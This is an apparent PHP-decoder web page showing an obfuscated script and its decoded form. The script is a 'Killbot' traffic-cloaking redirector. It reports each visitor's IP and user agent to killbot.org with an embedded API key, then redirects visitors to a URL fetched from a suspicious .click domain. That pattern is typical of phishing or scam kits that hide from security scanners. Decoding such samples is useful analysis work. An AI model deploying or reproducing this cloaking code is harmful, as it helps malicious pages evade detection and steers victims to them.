Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto Gevmn; FQ_p1: $config = array("\x61\x63\x74\151\x76\x65" => true, "\141\x70\x..

Decoded Output download

<?php 
 goto Gevmn; FQ_p1: $config = array("active" => true, "apikey" => "jjFQuw-dpXIXvbMqcdjj-ahBeVUmOFHdiN_K-OMp_mWnF", "raw_url" => "https://tracy-packe2us.click/GID"); goto FDKmC; WtMXT: $killbot->run(); goto pfDsh; Gevmn: error_reporting(0); goto IX5ny; FDKmC: $killbot = new Killbot($config); goto WtMXT; IX5ny: class Killbot { protected $server = "https://killbot.org"; protected $active; protected $apikey; protected $raw_url; protected $api_called = false; protected $redirectUrl; function __construct($config = array()) { $this->active = $config["active"]; $this->apikey = $config["apikey"]; $this->raw_url = $config["raw_url"]; } function get_client_ip() { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; } return $_SERVER["REMOTE_ADDR"]; } function httpGet($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_REFERER, "https://telegram.org"); curl_setopt($ch, CURLINFO_HEADER_OUT, true); $response = curl_exec($ch); curl_close($ch); return $response; } function get_redirect_url_from_raw_url() { $content = file_get_contents($this->raw_url); return trim($content); } function check() { if (!$this->api_called) { $ip = $this->get_client_ip(); $url = $this->server . "/api/v1/shortlink?ip=" . $ip . "&keyname=amonbb&apikey=" . $this->apikey . "&ua=" . urlencode($_SERVER["HTTP_USER_AGENT"]); $response = $this->httpGet($url); $json = json_decode($response, true); if (isset($json["data"]["block_access"]) && $json["data"]["block_access"] === true) { $this->redirectUrl = $json["data"]["direct_url"]; } else { $this->redirectUrl = $this->get_redirect_url_from_raw_url(); } $this->api_called = true; } return $this->redirectUrl; } function run() { if ($this->active == true) { $redirectUrl = $this->check(); if ($redirectUrl) { die(header("Location: " . $redirectUrl)); } } } } goto FQ_p1; pfDsh: ?>

Did this file decode correctly?

Original Code

<?php
 goto Gevmn; FQ_p1: $config = array("\x61\x63\x74\151\x76\x65" => true, "\141\x70\x69\x6b\145\171" => "\152\152\x46\121\x75\167\55\x64\x70\x58\x49\130\x76\142\x4d\161\143\144\x6a\x6a\55\141\150\102\x65\x56\x55\155\117\x46\x48\x64\x69\116\x5f\113\55\117\x4d\x70\137\155\x57\156\106", "\162\141\167\x5f\165\x72\154" => "\150\164\164\x70\163\72\x2f\57\164\162\141\143\x79\55\x70\141\143\x6b\x65\x32\165\163\56\143\x6c\x69\x63\x6b\x2f\107\x49\104"); goto FDKmC; WtMXT: $killbot->run(); goto pfDsh; Gevmn: error_reporting(0); goto IX5ny; FDKmC: $killbot = new Killbot($config); goto WtMXT; IX5ny: class Killbot { protected $server = "\150\x74\x74\160\x73\72\x2f\57\153\151\x6c\x6c\142\x6f\164\56\157\x72\x67"; protected $active; protected $apikey; protected $raw_url; protected $api_called = false; protected $redirectUrl; function __construct($config = array()) { $this->active = $config["\x61\143\x74\151\x76\145"]; $this->apikey = $config["\141\160\x69\153\x65\171"]; $this->raw_url = $config["\x72\x61\167\x5f\165\x72\x6c"]; } function get_client_ip() { if (isset($_SERVER["\110\124\x54\120\137\x43\x46\137\103\x4f\116\116\x45\x43\x54\x49\x4e\x47\137\x49\120"])) { return $_SERVER["\x48\x54\124\x50\137\103\106\x5f\103\x4f\116\x4e\105\103\x54\x49\x4e\107\x5f\111\120"]; } return $_SERVER["\x52\x45\x4d\117\x54\105\137\101\x44\x44\x52"]; } function httpGet($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_REFERER, "\150\164\164\160\x73\72\57\57\x74\145\x6c\x65\x67\x72\x61\x6d\x2e\157\162\147"); curl_setopt($ch, CURLINFO_HEADER_OUT, true); $response = curl_exec($ch); curl_close($ch); return $response; } function get_redirect_url_from_raw_url() { $content = file_get_contents($this->raw_url); return trim($content); } function check() { if (!$this->api_called) { $ip = $this->get_client_ip(); $url = $this->server . "\x2f\x61\160\x69\x2f\x76\x31\57\163\150\157\162\x74\x6c\x69\156\153\77\151\x70\75" . $ip . "\x26\x6b\x65\x79\156\x61\155\145\75\141\x6d\157\x6e\142\142\x26\141\160\151\x6b\x65\x79\75" . $this->apikey . "\x26\x75\x61\x3d" . urlencode($_SERVER["\110\x54\124\x50\137\125\x53\x45\122\137\x41\x47\x45\116\124"]); $response = $this->httpGet($url); $json = json_decode($response, true); if (isset($json["\x64\x61\164\x61"]["\142\x6c\x6f\x63\153\x5f\141\143\x63\145\163\163"]) && $json["\x64\141\164\x61"]["\142\x6c\157\143\153\137\x61\x63\143\145\163\x73"] === true) { $this->redirectUrl = $json["\144\x61\x74\141"]["\144\151\x72\145\x63\x74\137\x75\x72\154"]; } else { $this->redirectUrl = $this->get_redirect_url_from_raw_url(); } $this->api_called = true; } return $this->redirectUrl; } function run() { if ($this->active == true) { $redirectUrl = $this->check(); if ($redirectUrl) { die(header("\114\x6f\143\x61\x74\x69\x6f\x6e\72\40" . $redirectUrl)); } } } } goto FQ_p1; pfDsh: ?>

Function Calls

None

Variables

None

Stats

MD5	c7daefabd353f853fd83613ac1bb86a1
Eval Count	0
Decode Time	35 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats